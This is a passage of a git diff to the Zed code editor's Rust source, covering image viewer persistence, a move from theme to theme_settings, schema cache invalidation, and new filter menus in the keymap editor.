SerializableItem for ImageView { window: &mut Window, cx: &mut App, ) -> Task>> { + let db = ImageViewerDb::global(cx); window.spawn(cx, async move |cx| { - let image_path = IMAGE_VIEWER + let image_path = db .get_image_path(item_id, workspace_id)? .context("No image path found")?; @@ -624,13 +632,8 @@ impl SerializableItem for ImageView { _window: &mut Window, cx: &mut App, ) -> Task> { - delete_unloaded_items( - alive_items, - workspace_id, - "image_viewers", - &IMAGE_VIEWER, - cx, - ) + let db = ImageViewerDb::global(cx); + delete_unloaded_items(alive_items, workspace_id, "image_viewers", &db, cx) } fn serialize( @@ -644,12 +647,11 @@ impl SerializableItem for ImageView { let workspace_id = workspace.database_id()?; let image_path = self.image_item.read(cx).abs_path(cx)?; + let db = ImageViewerDb::global(cx); Some(cx.background_spawn({ async move { log::debug!("Saving image at path {image_path:?}"); - IMAGE_VIEWER - .save_image_path(item_id, workspace_id, image_path) - .await + db.save_image_path(item_id, workspace_id, image_path).await } })) } @@ -679,8 +681,8 @@ impl Render for ImageView { .size_full() .relative() .bg(cx.theme().colors().editor_background) - .child( - div() + .child({ + let container = div() .id("image-container") .size_full() .overflow_hidden() @@ -690,13 +692,16 @@ impl Render for ImageView { gpui::CursorStyle::OpenHand }) .on_scroll_wheel(cx.listener(Self::handle_scroll_wheel)) + .on_pinch(cx.listener(Self::handle_pinch)) .on_mouse_down(MouseButton::Left, cx.listener(Self::handle_mouse_down)) .on_mouse_down(MouseButton::Middle, cx.listener(Self::handle_mouse_down)) .on_mouse_up(MouseButton::Left, cx.listener(Self::handle_mouse_up)) .on_mouse_up(MouseButton::Middle, cx.listener(Self::handle_mouse_up)) .on_mouse_move(cx.listener(Self::handle_mouse_move)) - .child(ImageContentElement::new(cx.entity())), - ) + .child(ImageContentElement::new(cx.entity())); + + container + }) } } @@ -878,7 +883,7 @@ mod persistence { )]; } - db::static_connection!(IMAGE_VIEWER, ImageViewerDb, [WorkspaceDb]); + db::static_connection!(ImageViewerDb, [WorkspaceDb]); impl ImageViewerDb { query! { diff --git a/crates/inspector_ui/Cargo.toml b/crates/inspector_ui/Cargo.toml index 53d2f74b9c663496da083152ead17d479f5030eb..ec1f01195c82366a48a1ffa46397c6ce91ea6339 100644 --- a/crates/inspector_ui/Cargo.toml +++ b/crates/inspector_ui/Cargo.toml @@ -21,7 +21,7 @@ language.workspace = true project.workspace = true serde_json.workspace = true serde_json_lenient.workspace = true -theme.workspace = true +theme_settings.workspace = true ui.workspace = true util.workspace = true util_macros.workspace = true diff --git a/crates/inspector_ui/src/div_inspector.rs b/crates/inspector_ui/src/div_inspector.rs index a7616e134a16bbe2b96a6d23d20453b9a5ee4e5f..7ec2d7ba8303e899331d3f38642a9a51f4c14d4c 100644 --- a/crates/inspector_ui/src/div_inspector.rs +++ b/crates/inspector_ui/src/div_inspector.rs @@ -1,7 +1,6 @@ use anyhow::{Result, anyhow}; use editor::{ - Bias, CompletionProvider, Editor, EditorEvent, EditorMode, ExcerptId, MinimapVisibility, - MultiBuffer, + Bias, CompletionProvider, Editor, EditorEvent, EditorMode, MinimapVisibility, MultiBuffer, }; use fuzzy::StringMatch; use gpui::{ @@ -641,7 +640,6 @@ struct RustStyleCompletionProvider { impl CompletionProvider for RustStyleCompletionProvider { fn completions( &self, - _excerpt_id: ExcerptId, buffer: &Entity, position: Anchor, _: editor::CompletionContext, diff --git a/crates/inspector_ui/src/inspector.rs b/crates/inspector_ui/src/inspector.rs index 3c90bd7d6c6d550140df85c4c7547bd5b5700149..b687ea70a57d0f1b8ea97e4767d98eb701b77080 100644 --- a/crates/inspector_ui/src/inspector.rs +++ b/crates/inspector_ui/src/inspector.rs @@ -57,7 +57,7 @@ fn render_inspector( window: &mut Window, cx: &mut Context, ) -> AnyElement { - let ui_font = theme::setup_ui_font(window, cx); + let ui_font = theme_settings::setup_ui_font(window, cx); let colors = cx.theme().colors(); let inspector_id = inspector.active_element_id(); let toolbar_height = platform_title_bar_height(window); diff --git a/crates/journal/src/journal.rs b/crates/journal/src/journal.rs index ba97bcf66a77659fb3196ba45ebb3f831452e008..b8028c79b3d5da415a52d946d7601d8cbb40f738 100644 --- a/crates/journal/src/journal.rs +++ b/crates/journal/src/journal.rs @@ -9,7 +9,7 @@ use std::{ path::{Path, PathBuf}, sync::Arc, }; -use workspace::{AppState, OpenVisible, Workspace}; +use workspace::{AppState, OpenResult, OpenVisible, Workspace}; actions!( journal, @@ -107,7 +107,10 @@ pub fn new_journal_entry(workspace: &Workspace, window: &mut Window, cx: &mut Ap .spawn(cx, async move |cx| { let (journal_dir, entry_path) = create_entry.await?; let opened = if open_new_workspace { - let (new_workspace, _) = cx + let OpenResult { + window: new_workspace, + .. + } = cx .update(|_window, cx| { workspace::open_paths( &[journal_dir], diff --git a/crates/json_schema_store/src/json_schema_store.rs b/crates/json_schema_store/src/json_schema_store.rs index 756f64b2fb1bac13fc6d2868989504a3f8241281..c13f42f9bb7d92b7c136815f720abfe6ec6faac3 100644 --- a/crates/json_schema_store/src/json_schema_store.rs +++ b/crates/json_schema_store/src/json_schema_store.rs @@ -67,25 +67,22 @@ pub fn init(cx: &mut App) { .detach(); if let Some(extension_events) = extension::ExtensionEvents::try_global(cx) { - cx.subscribe(&extension_events, move |_, evt, cx| { - match evt { - extension::Event::ExtensionInstalled(_) - | extension::Event::ExtensionUninstalled(_) - | extension::Event::ConfigureExtensionRequested(_) => return, - extension::Event::ExtensionsInstalledChanged => {} + cx.subscribe(&extension_events, move |_, evt, cx| match evt { + extension::Event::ExtensionsInstalledChanged => { + cx.update_global::(|schema_store, cx| { + schema_store.notify_schema_changed(ChangedSchemas::Settings, cx); + }); } - cx.update_global::(|schema_store, cx| { - schema_store.notify_schema_changed(&format!("{SCHEMA_URI_PREFIX}settings"), cx); - schema_store - .notify_schema_changed(&format!("{SCHEMA_URI_PREFIX}project_settings"), cx); - }); + extension::Event::ExtensionUninstalled(_) + | extension::Event::ExtensionInstalled(_) + | extension::Event::ConfigureExtensionRequested(_) => {} }) .detach(); } cx.observe_global::(move |cx| { cx.update_global::(|schema_store, cx| { - schema_store.notify_schema_changed(&format!("{SCHEMA_URI_PREFIX}debug_tasks"), cx); + schema_store.notify_schema_changed(ChangedSchemas::DebugTasks, cx); }); }) .detach(); @@ -98,18 +95,42 @@ pub struct SchemaStore { impl gpui::Global for SchemaStore {} +enum ChangedSchemas { + Settings, + DebugTasks, +} + impl SchemaStore { - fn notify_schema_changed(&mut self, uri: &str, cx: &mut App) { - DYNAMIC_SCHEMA_CACHE.write().remove(uri); + fn notify_schema_changed(&mut self, changed_schemas: ChangedSchemas, cx: &mut App) { + let uris_to_invalidate = match changed_schemas { + ChangedSchemas::Settings => { + let settings_uri_prefix = &format!("{SCHEMA_URI_PREFIX}settings"); + let project_settings_uri = &format!("{SCHEMA_URI_PREFIX}project_settings"); + DYNAMIC_SCHEMA_CACHE + .write() + .extract_if(|uri, _| { + uri == project_settings_uri || uri.starts_with(settings_uri_prefix) + }) + .map(|(url, _)| url) + .collect() + } + ChangedSchemas::DebugTasks => DYNAMIC_SCHEMA_CACHE + .write() + .remove_entry(&format!("{SCHEMA_URI_PREFIX}debug_tasks")) + .map_or_else(Vec::new, |(uri, _)| vec![uri]), + }; + + if uris_to_invalidate.is_empty() { + return; + } - let uri = uri.to_string(); self.lsp_stores.retain(|lsp_store| { let Some(lsp_store) = lsp_store.upgrade() else { return false; }; - project::lsp_store::json_language_server_ext::notify_schema_changed( + project::lsp_store::json_language_server_ext::notify_schemas_changed( lsp_store, - uri.clone(), + &uris_to_invalidate, cx, ); true @@ -238,7 +259,8 @@ async fn resolve_dynamic_schema( (adapter_name, LspSchemaKind::Settings) } else { anyhow::bail!( - "Invalid LSP schema path: expected '{{adapter}}/initialization_options' or '{{adapter}}/settings', got '{}'", + "Invalid LSP schema path: \ + Expected '{{adapter}}/initialization_options' or '{{adapter}}/settings', got '{}'", lsp_path ); }; @@ -484,7 +506,7 @@ pub fn all_schema_file_associations( let file_name = normalized_action_name_to_file_name(normalized_name.clone()); serde_json::json!({ "fileMatch": [file_name], - "url": format!("{}action/{normalized_name}", SCHEMA_URI_PREFIX) + "url": format!("{SCHEMA_URI_PREFIX}action/{normalized_name}") }) })); diff --git a/crates/keymap_editor/Cargo.toml b/crates/keymap_editor/Cargo.toml index 33ba95ddd6d8df7efe2f551451af0340d83369c7..63bfba05d4e12251a9a267984dabc7420a8c7577 100644 --- a/crates/keymap_editor/Cargo.toml +++ b/crates/keymap_editor/Cargo.toml @@ -36,6 +36,7 @@ settings.workspace = true telemetry.workspace = true tempfile.workspace = true theme.workspace = true +theme_settings.workspace = true tree-sitter-json.workspace = true tree-sitter-rust.workspace = true ui_input.workspace = true diff --git a/crates/keymap_editor/src/action_completion_provider.rs b/crates/keymap_editor/src/action_completion_provider.rs index 98428baeb2f7b419ba7354130e12f1a4710c8aea..10d977572b9c52cba1ad9d87c7035bd1552d5e33 100644 --- a/crates/keymap_editor/src/action_completion_provider.rs +++ b/crates/keymap_editor/src/action_completion_provider.rs @@ -26,7 +26,6 @@ impl ActionCompletionProvider { impl CompletionProvider for ActionCompletionProvider { fn completions( &self, - _excerpt_id: editor::ExcerptId, buffer: &Entity, buffer_position: language::Anchor, _trigger: editor::CompletionContext, diff --git a/crates/keymap_editor/src/keymap_editor.rs b/crates/keymap_editor/src/keymap_editor.rs index ff3389a4d4a10bc8472d0931d18ffa5be839c631..ee9f6a11c2b51f7993b17c01352cfb97b535049a 100644 --- a/crates/keymap_editor/src/keymap_editor.rs +++ b/crates/keymap_editor/src/keymap_editor.rs @@ -24,22 +24,23 @@ use gpui::{ actions, anchored, deferred, div, }; use language::{Language, LanguageConfig, ToOffset as _}; + use notifications::status_toast::{StatusToast, ToastIcon}; use project::{CompletionDisplayOptions, Project}; use settings::{ BaseKeymap, KeybindSource, KeymapFile, Settings as _, SettingsAssets, infer_json_indent_size, }; use ui::{ - ActiveTheme as _, App, Banner, BorrowAppContext, ContextMenu, IconButtonShape, Indicator, - Modal, ModalFooter, ModalHeader, ParentElement as _, PopoverMenu, Render, Section, - SharedString, Styled as _, Table, TableColumnWidths, TableInteractionState, - TableResizeBehavior, Tooltip, Window, prelude::*, + ActiveTheme as _, App, Banner, BorrowAppContext, ColumnWidthConfig, ContextMenu, + IconButtonShape, IconPosition, Indicator, Modal, ModalFooter, ModalHeader, ParentElement as _, + PopoverMenu, RedistributableColumnsState, Render, Section, SharedString, Styled as _, Table, + TableInteractionState, TableResizeBehavior, Tooltip, Window, prelude::*, }; use ui_input::InputField; use util::ResultExt; use workspace::{ Item, ModalView, SerializableItem, Workspace, notifications::NotifyTaskExt as _, - register_serializable_item, + register_serializable_item, with_active_or_new_workspace, }; pub use ui_components::*; @@ -47,7 +48,7 @@ use zed_actions::{ChangeKeybinding, OpenKeymap}; use crate::{ action_completion_provider::ActionCompletionProvider, - persistence::KEYBINDING_EDITORS, + persistence::KeybindingEditorDb, ui_components::keystroke_input::{ ClearKeystrokes, KeystrokeInput, StartRecording, StopRecording, }, @@ -73,6 +74,8 @@ actions!( CopyContext, /// Toggles Conflict Filtering ToggleConflictFilter, + /// Toggles whether NoAction bindings are shown + ToggleNoActionBindings, /// Toggle Keystroke search ToggleKeystrokeSearch, /// Toggles exact matching for keystroke search @@ -126,14 +129,16 @@ pub fn init(cx: &mut App) { } } + cx.on_action(|_: &OpenKeymap, cx| { + with_active_or_new_workspace(cx, |workspace, window, cx| { + open_keymap_editor(None, workspace, window, cx); + }); + }); + cx.observe_new(|workspace: &mut Workspace, _window, _cx| { - workspace - .register_action(|workspace, _: &OpenKeymap, window, cx| { - open_keymap_editor(None, workspace, window, cx); - }) - .register_action(|workspace, action: &ChangeKeybinding, window, cx| { - open_keymap_editor(Some(action.action.clone()), workspace, window, cx); - }); + workspace.register_action(|workspace, action: &ChangeKeybinding, window, cx| { + open_keymap_editor(Some(action.action.clone()), workspace, window, cx); + }); }) .detach(); @@ -183,7 +188,7 @@ impl KeymapEventChannel { } } -#[derive(Default, PartialEq)] +#[derive(Default, PartialEq, Copy, Clone)] enum SearchMode { #[default] Normal, @@ -224,6 +229,25 @@ impl FilterState { } } +#[derive(Default, PartialEq, Eq, Copy, Clone)] +struct SourceFilters { + user: bool, + zed_defaults: bool, + vim_defaults: bool, +} + +impl SourceFilters { + fn allows(&self, source: Option) -> bool { + match source { + Some(KeybindSource::User) => self.user, + Some(KeybindSource::Vim) => self.vim_defaults, + Some(KeybindSource::Base | KeybindSource::Default | KeybindSource::Unknown) | None => { + self.zed_defaults + } + } + } +} + #[derive(Debug, Default, PartialEq, Eq, Clone, Hash)] struct ActionMapping { keystrokes: Rc<[KeybindingKeystroke]>, @@ -412,6 +436,8 @@ struct KeymapEditor { keybindings: Vec, keybinding_conflict_state: ConflictState, filter_state: FilterState, + source_filters: SourceFilters, + show_no_action_bindings: bool, search_mode: SearchMode, search_query_debounce: Option>, // corresponds 1 to 1 with keybindings @@ -424,7 +450,7 @@ struct KeymapEditor { context_menu: Option<(Entity, Point, Subscription)>, previous_edit: Option, humanized_action_names: HumanizedActionNameCache, - current_widths: Entity, + current_widths: Entity, show_hover_menus: bool, actions_with_schemas: HashSet<&'static str>, /// In order for the JSON LSP to run in the actions arguments editor, we @@ -477,13 +503,48 @@ fn keystrokes_match_exactly( }) } +fn disabled_binding_matches_context( + disabled_binding: &gpui::KeyBinding, + binding: &gpui::KeyBinding, +) -> bool { + match ( + disabled_binding.predicate().as_deref(), + binding.predicate().as_deref(), + ) { + (None, _) => true, + (Some(_), None) => false, + (Some(disabled_predicate), Some(predicate)) => disabled_predicate.is_superset(predicate), + } +} + +fn binding_is_unbound_by_unbind( + binding: &gpui::KeyBinding, + binding_index: usize, + all_bindings: &[&gpui::KeyBinding], +) -> bool { + all_bindings[binding_index + 1..] + .iter() + .rev() + .any(|disabled_binding| { + gpui::is_unbind(disabled_binding.action()) + && keystrokes_match_exactly(disabled_binding.keystrokes(), binding.keystrokes()) + && disabled_binding + .action() + .as_any() + .downcast_ref::() + .is_some_and(|unbind| unbind.0.as_ref() == binding.action().name()) + && disabled_binding_matches_context(disabled_binding, binding) + }) +} + impl KeymapEditor { fn new(workspace: WeakEntity, window: &mut Window, cx: &mut Context) -> Self { let _keymap_subscription = cx.observe_global_in::(window, Self::on_keymap_changed); let table_interaction_state = cx.new(|cx| { - TableInteractionState::new(cx) - .with_custom_scrollbar(ui::Scrollbars::for_settings::()) + TableInteractionState::new(cx).with_custom_scrollbar(ui::Scrollbars::for_settings::< + editor::EditorSettingsScrollbarProxy, + >()) }); let keystroke_editor = cx.new(|cx| { @@ -539,6 +600,12 @@ impl KeymapEditor { keybindings: vec![], keybinding_conflict_state: ConflictState::default(), filter_state: FilterState::default(), + source_filters: SourceFilters { + user: true, + zed_defaults: true, + vim_defaults: true, + }, + show_no_action_bindings: true, search_mode: SearchMode::default(), string_match_candidates: Arc::new(vec![]), matches: vec![], @@ -556,7 +623,27 @@ impl KeymapEditor { actions_with_schemas: HashSet::default(), action_args_temp_dir: None, action_args_temp_dir_worktree: None, - current_widths: cx.new(|cx| TableColumnWidths::new(COLS, cx)), + current_widths: cx.new(|_cx| { + RedistributableColumnsState::new( + COLS, + vec![ + DefiniteLength::Absolute(AbsoluteLength::Pixels(px(36.))), + DefiniteLength::Fraction(0.25), + DefiniteLength::Fraction(0.20), + DefiniteLength::Fraction(0.14), + DefiniteLength::Fraction(0.45), + DefiniteLength::Fraction(0.08), + ], + vec![ + TableResizeBehavior::None, + TableResizeBehavior::Resizable, + TableResizeBehavior::Resizable, + TableResizeBehavior::Resizable, + TableResizeBehavior::Resizable, + TableResizeBehavior::Resizable, + ], + ) + }), }; this.on_keymap_changed(window, cx); @@ -637,6 +724,11 @@ impl KeymapEditor { ) .await; this.update(cx, |this, cx| { + matches.retain(|candidate| { + this.source_filters + .allows(this.keybindings[candidate.candidate_id].keybind_source()) + }); + match this.filter_state { FilterState::Conflicts => { matches.retain(|candidate| { @@ -695,6 +787,10 @@ impl KeymapEditor { SearchMode::Normal => {} } + if !this.show_no_action_bindings { + matches.retain(|item| !this.keybindings[item.candidate_id].is_no_action()); + } + if action_query.is_empty() { matches.sort_by(|item1, item2| { let binding1 = &this.keybindings[item1.candidate_id]; @@ -729,7 +825,7 @@ impl KeymapEditor { ) { let key_bindings_ptr = cx.key_bindings(); let lock = key_bindings_ptr.borrow(); - let key_bindings = lock.bindings(); + let key_bindings = lock.bindings().collect::>(); let mut unmapped_action_names = HashSet::from_iter(cx.all_action_names().iter().copied()); let action_documentation = cx.action_documentation(); let mut generator = KeymapFile::action_schema_generator(); @@ -742,13 +838,20 @@ impl KeymapEditor { let mut processed_bindings = Vec::new(); let mut string_match_candidates = Vec::new(); - for key_binding in key_bindings { + for (binding_index, &key_binding) in key_bindings.iter().enumerate() { + if gpui::is_unbind(key_binding.action()) { + continue; + } + let source = key_binding .meta() .map(KeybindSource::from_meta) .unwrap_or(KeybindSource::Unknown); let keystroke_text = ui::text_for_keybinding_keystrokes(key_binding.keystrokes(), cx); + let is_no_action = gpui::is_no_action(key_binding.action()); + let is_unbound_by_unbind = + binding_is_unbound_by_unbind(key_binding, binding_index, &key_bindings); let binding = KeyBinding::new(key_binding, source); let context = key_binding @@ -783,6 +886,8 @@ impl KeymapEditor { binding, context, source, + is_no_action, + is_unbound_by_unbind, action_information, )); string_match_candidates.push(string_match_candidate); @@ -976,20 +1081,23 @@ impl KeymapEditor { .and_then(KeybindContextString::local) .is_none(); - let selected_binding_is_unbound = selected_binding.is_unbound(); + let selected_binding_is_unmapped = selected_binding.is_unbound(); + let selected_binding_is_suppressed = selected_binding.is_unbound_by_unbind(); + let selected_binding_is_non_interactable = + selected_binding_is_unmapped || selected_binding_is_suppressed; let context_menu = ContextMenu::build(window, cx, |menu, _window, _cx| { menu.context(self.focus_handle.clone()) - .when(selected_binding_is_unbound, |this| { + .when(selected_binding_is_unmapped, |this| { this.action("Create", Box::new(CreateBinding)) }) .action_disabled_when( - selected_binding_is_unbound, + selected_binding_is_non_interactable, "Edit", Box::new(EditBinding), ) .action_disabled_when( - selected_binding_is_unbound, + selected_binding_is_non_interactable, "Delete", Box::new(DeleteBinding), ) @@ -1037,9 +1145,15 @@ impl KeymapEditor { &self, index: usize, conflict: Option, + is_unbound_by_unbind: bool, cx: &mut Context, ) -> IconButton { - if self.filter_state != FilterState::Conflicts + if is_unbound_by_unbind { + base_button_style(index, IconName::Warning) + .icon_color(Color::Warning) + .disabled(true) + .tooltip(Tooltip::text("This action is unbound")) + } else if self.filter_state != FilterState::Conflicts && let Some(conflict) = conflict { if conflict.is_user_keybind_conflict() { @@ -1199,6 +1313,9 @@ impl KeymapEditor { let Some((keybind, keybind_index)) = self.selected_keybind_and_index() else { return; }; + if !create && keybind.is_unbound_by_unbind() { + return; + } let keybind = keybind.clone(); let keymap_editor = cx.entity(); @@ -1305,6 +1422,9 @@ impl KeymapEditor { let Some(to_remove) = self.selected_binding().cloned() else { return; }; + if to_remove.is_unbound_by_unbind() { + return; + } let std::result::Result::Ok(fs) = self .workspace @@ -1367,6 +1487,31 @@ impl KeymapEditor { self.set_filter_state(self.filter_state.invert(), cx); } + fn toggle_no_action_bindings( + &mut self, + _: &ToggleNoActionBindings, + _: &mut Window, + cx: &mut Context, + ) { + self.show_no_action_bindings = !self.show_no_action_bindings; + self.on_query_changed(cx); + } + + fn toggle_user_bindings_filter(&mut self, cx: &mut Context) { + self.source_filters.user = !self.source_filters.user; + self.on_query_changed(cx); + } + + fn toggle_zed_defaults_filter(&mut self, cx: &mut Context) { + self.source_filters.zed_defaults = !self.source_filters.zed_defaults; + self.on_query_changed(cx); + } + + fn toggle_vim_defaults_filter(&mut self, cx: &mut Context) { + self.source_filters.vim_defaults = !self.source_filters.vim_defaults; + self.on_query_changed(cx); + } + fn set_filter_state(&mut self, filter_state: FilterState, cx: &mut Context) { if self.filter_state != filter_state { self.filter_state = filter_state; @@ -1442,6 +1587,127 @@ impl KeymapEditor { .filter(|kb| kb.keystrokes().is_some()) .any(|kb| kb.action().name == action_name) } + + fn render_filter_dropdown( + &self, + focus_handle: &FocusHandle, + cx: &mut Context, + ) -> impl IntoElement { + let focus_handle = focus_handle.clone(); + let keymap_editor = cx.entity(); + return PopoverMenu::new("keymap-editor-filter-menu") + .menu(move |window, cx| { + Some(ContextMenu::build_persistent(window, cx, { + let focus_handle = focus_handle.clone(); + let keymap_editor = keymap_editor.clone(); + move |mut menu, _window, cx| { + let (filter_state, source_filters, show_no_action_bindings) = keymap_editor + .read_with(cx, |editor, _| { + ( + editor.filter_state, + editor.source_filters, + editor.show_no_action_bindings, + ) + }); + + menu = menu + .context(focus_handle.clone()) + .header("Filters") + .map(add_filter( + "Conflicts", + matches!(filter_state, FilterState::Conflicts), + Some(ToggleConflictFilter.boxed_clone()), + &focus_handle, + &keymap_editor, + None, + )) + .map(add_filter( + "No Action", + show_no_action_bindings, + Some(ToggleNoActionBindings.boxed_clone()), + &focus_handle, + &keymap_editor, + None, + )) + .separator() + .header("Categories") + .map(add_filter( + "User", + source_filters.user, + None, + &focus_handle, + &keymap_editor, + Some(|editor, cx| { + editor.toggle_user_bindings_filter(cx); + }), + )) + .map(add_filter( + "Default", + source_filters.zed_defaults, + None, + &focus_handle, + &keymap_editor, + Some(|editor, cx| { + editor.toggle_zed_defaults_filter(cx); + }), + )) + .map(add_filter( + "Vim", + source_filters.vim_defaults, + None, + &focus_handle, + &keymap_editor, + Some(|editor, cx| { + editor.toggle_vim_defaults_filter(cx); + }), + )); + menu + } + })) + }) + .anchor(gpui::Corner::TopRight) + .offset(gpui::Point { + x: px(0.0), + y: px(2.0), + }) + .trigger_with_tooltip( + IconButton::new("KeymapEditorFilterMenuButton", IconName::Sliders) + .icon_size(IconSize::Small) + .when( + self.keybinding_conflict_state.any_user_binding_conflicts(), + |this| this.indicator(Indicator::dot().color(Color::Warning)), + ), + Tooltip::text("Filters"), + ); + + fn add_filter( + name: &'static str, + toggled: bool, + action: Option>, + focus_handle: &FocusHandle, + keymap_editor: &Entity, + cb: Option)>, + ) -> impl FnOnce(ContextMenu) -> ContextMenu { + let focus_handle = focus_handle.clone(); + let keymap_editor = keymap_editor.clone(); + return move |menu: ContextMenu| { + menu.toggleable_entry( + name, + toggled, + IconPosition::End, + action.as_ref().map(|a| a.boxed_clone()), + move |window, cx| { + window.focus(&focus_handle, cx); + if let Some(action) = &action { + window.dispatch_action(action.boxed_clone(), cx); + } else if let Some(cb) = cb { + keymap_editor.update(cx, cb); + } + }, + ) + }; + } + } } struct HumanizedActionNameCache { @@ -1488,6 +1754,8 @@ struct KeybindInformation { binding: KeyBinding, context: KeybindContextString, source: KeybindSource, + is_no_action: bool, + is_unbound_by_unbind: bool, } impl KeybindInformation { @@ -1538,6 +1806,8 @@ impl ProcessedBinding { binding: KeyBinding, context: KeybindContextString, source: KeybindSource, + is_no_action: bool, + is_unbound_by_unbind: bool, action_information: ActionInformation, ) -> Self { Self::Mapped( @@ -1546,6 +1816,8 @@ impl ProcessedBinding { binding, context, source, + is_no_action, + is_unbound_by_unbind, }, action_information, ) @@ -1584,6 +1856,16 @@ impl ProcessedBinding { self.keybind_information().map(|keybind| &keybind.binding) } + fn is_no_action(&self) -> bool { + self.keybind_information() + .is_some_and(|keybind| keybind.is_no_action) + } + + fn is_unbound_by_unbind(&self) -> bool { + self.keybind_information() + .is_some_and(|keybind| keybind.is_unbound_by_unbind) + } + fn keystroke_text(&self) -> Option<&SharedString> { self.keybind_information() .map(|binding| &binding.keystroke_text) @@ -1694,6 +1976,7 @@ impl Render for KeymapEditor { let row_count = self.matches.len(); let focus_handle = &self.focus_handle; let theme = cx.theme(); + let search_mode = self.search_mode; v_flex() .id("keymap-editor") @@ -1711,6 +1994,7 @@ impl Render for KeymapEditor { .on_action(cx.listener(Self::copy_action_to_clipboard)) .on_action(cx.listener(Self::copy_context_to_clipboard)) .on_action(cx.listener(Self::toggle_conflict_filter)) + .on_action(cx.listener(Self::toggle_no_action_bindings)) .on_action(cx.listener(Self::toggle_keystroke_search)) .on_action(cx.listener(Self::toggle_exact_keystroke_matching)) .on_action(cx.listener(Self::show_matching_keystrokes)) @@ -1727,6 +2011,7 @@ impl Render for KeymapEditor { .child( h_flex() .gap_2() + .items_center() .child( h_flex() .key_context({ @@ -1748,152 +2033,65 @@ impl Render for KeymapEditor { h_flex() .gap_1() .min_w_96() + .items_center() .child( IconButton::new( - "KeymapEditorToggleFiltersIcon", + "KeymapEditorKeystrokeSearchButton", IconName::Keyboard, ) .icon_size(IconSize::Small) + .toggle_state(matches!( + search_mode, + SearchMode::KeyStroke { .. } + )) .tooltip({ let focus_handle = focus_handle.clone(); - move |_window, cx| { Tooltip::for_action_in( - "Search by Keystroke", + "Search by Keystrokes", &ToggleKeystrokeSearch, - &focus_handle.clone(), + &focus_handle, cx, ) } }) - .toggle_state(matches!( - self.search_mode, - SearchMode::KeyStroke { .. } - )) - .on_click(|_, window, cx| { + .on_click(cx.listener(|_, _, window, cx| { window.dispatch_action( ToggleKeystrokeSearch.boxed_clone(), cx, ); - }), + })), ) .child( - IconButton::new("KeymapEditorConflictIcon", IconName::Warning) - .icon_size(IconSize::Small) - .when( - self.keybinding_conflict_state - .any_user_binding_conflicts(), - |this| { - this.indicator( - Indicator::dot().color(Color::Warning), - ) - }, + self.render_filter_dropdown(focus_handle, cx) + ) + .child( + Button::new("edit-in-json", "Edit in JSON") + .style(ButtonStyle::Subtle) + .key_binding( + ui::KeyBinding::for_action_in(&zed_actions::OpenKeymapFile, &focus_handle, cx) + .map(|kb| kb.size(rems_from_px(10.))), ) - .tooltip({ - let filter_state = self.filter_state; - let focus_handle = focus_handle.clone(); - - move |_window, cx| { - Tooltip::for_action_in( - match filter_state { - FilterState::All => "Show Conflicts", - FilterState::Conflicts => { - "Hide Conflicts" - } - }, - &ToggleConflictFilter, - &focus_handle.clone(), - cx, - ) - } - }) - .selected_icon_color(Color::Warning) - .toggle_state(matches!( - self.filter_state, - FilterState::Conflicts - )) .on_click(|_, window, cx| { window.dispatch_action( - ToggleConflictFilter.boxed_clone(), + zed_actions::OpenKeymapFile.boxed_clone(), cx, ); - }), + }) ) .child( - h_flex() - .w_full() - .px_1p5() - .gap_1() - .justify_end() - .child( - PopoverMenu::new("open-keymap-menu") - .menu(move |window, cx| { - Some(ContextMenu::build(window, cx, |menu, _, _| { - menu.header("View Default...") - .action( - "Zed Key Bindings", - zed_actions::OpenDefaultKeymap - .boxed_clone(), - ) - .action( - "Vim Bindings", - zed_actions::vim::OpenDefaultKeymap.boxed_clone(), - ) - })) - }) - .anchor(gpui::Corner::TopRight) - .offset(gpui::Point { - x: px(0.0), - y: px(2.0), - }) - .trigger_with_tooltip( - IconButton::new( - "OpenKeymapJsonButton", - IconName::Ellipsis, - ) - .icon_size(IconSize::Small), - { - let focus_handle = focus_handle.clone(); - move |_window, cx| { - Tooltip::for_action_in( - "View Default...", - &zed_actions::OpenKeymapFile, - &focus_handle, - cx, - ) - } - }, - ), - ) - .child( - Button::new("edit-in-json", "Edit in JSON") - .style(ButtonStyle::Subtle) - .key_binding( - ui::KeyBinding::for_action_in(&zed_actions::OpenKeymapFile, &focus_handle, cx) - .map(|kb| kb.size(rems_from_px(10.))), - ) - .on_click(|_, window, cx| { - window.dispatch_action( - zed_actions::OpenKeymapFile.boxed_clone(), - cx, - ); - }) - ) - .child( - Button::new("create", "Create Keybinding") - .style(ButtonStyle::Outlined) - .key_binding( - ui::KeyBinding::for_action_in(&OpenCreateKeybindingModal, &focus_handle, cx) - .map(|kb| kb.size(rems_from_px(10.))), - ) - .on_click(|_, window, cx| { - window.dispatch_action( - OpenCreateKeybindingModal.boxed_clone(), - cx, - ); - }) + Button::new("create", "Create Keybinding") + .style(ButtonStyle::Outlined) + .key_binding( + ui::KeyBinding::for_action_in(&OpenCreateKeybindingModal, &focus_handle, cx) + .map(|kb| kb.size(rems_from_px(10.))), ) - + .on_click(|_, window, cx| { + window.dispatch_action( + OpenCreateKeybindingModal.boxed_clone(), + cx, + ); + }) ) ), ) @@ -1917,26 +2115,9 @@ impl Render for KeymapEditor { let this = cx.entity(); move |window, cx| this.read(cx).render_no_matches_hint(window, cx) }) - .column_widths(vec![ - DefiniteLength::Absolute(AbsoluteLength::Pixels(px(36.))), - DefiniteLength::Fraction(0.25), - DefiniteLength::Fraction(0.20), - DefiniteLength::Fraction(0.14), - DefiniteLength::Fraction(0.45), - DefiniteLength::Fraction(0.08), - ]) - .resizable_columns( - vec![ - TableResizeBehavior::None, - TableResizeBehavior::Resizable, - TableResizeBehavior::Resizable, - TableResizeBehavior::Resizable, - TableResizeBehavior::Resizable, - TableResizeBehavior::Resizable, // this column doesn't matter - ], - &self.current_widths, - cx, - ) + .width_config(ColumnWidthConfig::redistributable( + self.current_widths.clone(), + )) .header(vec!["", "Action", "Arguments", "Keystrokes", "Context", "Source"]) .uniform_list( "keymap-editor-table", @@ -1949,11 +2130,18 @@ impl Render for KeymapEditor { let binding = &this.keybindings[candidate_id]; let action_name = binding.action().name; let conflict = this.get_conflict(index); + let is_unbound_by_unbind = binding.is_unbound_by_unbind(); let is_overridden = conflict.is_some_and(|conflict| { !conflict.is_user_keybind_conflict() }); + let is_dimmed = is_overridden || is_unbound_by_unbind; - let icon = this.create_row_button(index, conflict, cx); + let icon = this.create_row_button( + index, + conflict, + is_unbound_by_unbind, + cx, + ); let action = div() .id(("keymap action", index)) @@ -1974,7 +2162,7 @@ impl Render for KeymapEditor { .when( !context_menu_deployed && this.show_hover_menus - && !is_overridden, + && !is_dimmed, |this| { this.tooltip({ let action_name = binding.action().name; @@ -2000,7 +2188,7 @@ impl Render for 